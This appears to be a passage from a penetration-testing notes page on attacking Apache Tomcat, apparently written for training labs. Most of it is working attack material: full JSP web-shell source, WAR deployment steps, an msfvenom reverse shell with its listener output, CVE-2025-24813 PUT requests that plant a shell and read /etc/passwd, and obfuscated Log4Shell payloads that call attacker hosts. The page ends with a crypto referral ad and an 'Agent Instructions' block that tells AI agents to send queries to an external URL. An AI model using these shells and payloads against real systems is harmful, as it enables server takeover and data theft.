<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + " ");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
```
```shell-session
$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%)
```
`Browse` to select the .war file and then click on `Deploy`.
```shell-session
$ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
Command: id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
```
### Msfvenom
```shell-session
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
```
```shell-session
nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
```
### Metasploit
`multi/http/tomcat_mgr_upload`
## Exploitation
{% content-ref url="/pages/T4JGQDdvKRiioaVzxp5X" %}
[Web Shell](/0xss0rz/pentest/shells/web-shell.md)
{% endcontent-ref %}
## JMX Proxy
{% embed url="" %}
## CVE-2025-24813 Apache Tomcat RCE
* Apache Tomcat 11.0.0-M1 to 11.0.2
* Apache Tomcat 10.1.0-M1 to 10.1.34
* Apache Tomcat 9.0.0.M1 to 9.0.98
Upload a malicious serialized payload to the server, leading to arbitrary code execution via deserialization when specific conditions are met.
{% embed url="" %}
```
PUT /uploads/../webapps/ROOT/shell.jsp HTTP/1.1
Host: vulnerable-server.com
Content-Length: 512
Content-Type: application/x-jsp
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
String output = "";
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
output += line + " ";
}
out.println(output);
}
%>
```
```
http://vulnerable-server.com/shell.jsp?cmd=whoami
```
or with Curl
{% embed url="" %}
```
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+" "); } } %>
' -i
```
```
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
```
{% embed url="" %}
{% embed url="" %}
## CVE-2024-50379 - RCE
**Time-of-Check Time-of-Use (TOCTOU) race condition** that can lead to remote code execution (RCE) if the server's configuration allows writable directories.
Upload a JSP shell to a vulnerable server and execute commands remotely.
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
## CVE-2024-52316 - Authentification Bypass
| Version Series | Affected Versions |
| ------------------ | ------------------------- |
| Apache Tomcat 11.0 | Versions prior to 11.0.0 |
| Apache Tomcat 10.1 | Versions prior to 10.1.31 |
| Apache Tomcat 9.0 | Versions prior to 9.0.96 |
{% embed url="" %}
## CVE-2024-40725 and CVE-2024-40898 - SSRF
Apache HTTP Server versions 2.4.0 through 2.4.61
{% embed url="" %}
## CVE-2024-52318 - XSS
Apache Tomcat 11.0 Versions prior to 11.0.1 Apache Tomcat 10.1 Versions prior to 10.1.33 Apache Tomcat 9.0 Versions prior to 9.0.97
{% embed url="" %}
## CVE-2024-52317 - Data Leakage
Apache Tomcat 11.0 Versions prior to 11.0.0 Apache Tomcat 10.1 Versions prior to 10.1.31 Apache Tomcat 9.0 Versions prior to 9.0.96
{% embed url="" %}
## Ghostcat
{% embed url="" %}
```shell-session
nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
```
{% hint style="warning" %}
*The exploit can only read files and folders within the web apps folder, which means that files* *like* *`/etc/passwd` can’t be accessed.*
{% endhint %}
{% embed url="" %}
```shell-session
python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
```
python3 exploit:
{% embed url="" %}
## Log4Shell
{% embed url="" %}
{% embed url="" %}
```
python3 -m pip install Log4jScanner
log4jscanner -m urls --th 100 -c canarytokens -f db/headers-large.txt
```
```
${jndi:ldap://xxxxx.burpcollaborator.net/a}
```
```
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload
```
```
# ":-" notation
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://somesitehackerofhell.com/z}
# Unicode characters
${\u006a\u006e\u0064\u0069:ldap://somesitehackerofhell.com/z}
# "::-" notation
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
```
{% embed url="" %}
## Spring4Shell
{% embed url="" %}
## Tomcat CGI
{% content-ref url="/pages/ARxv05fqbpOpkBlKZwNU" %}
[Tomcat CGI](/0xss0rz/pentest/web-attacks/tomcat-cgi.md)
{% endcontent-ref %}
## Tools
{% embed url="" %}
## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)
[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books
{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}
{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}
* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
## Resources
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/tomcat-8080.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.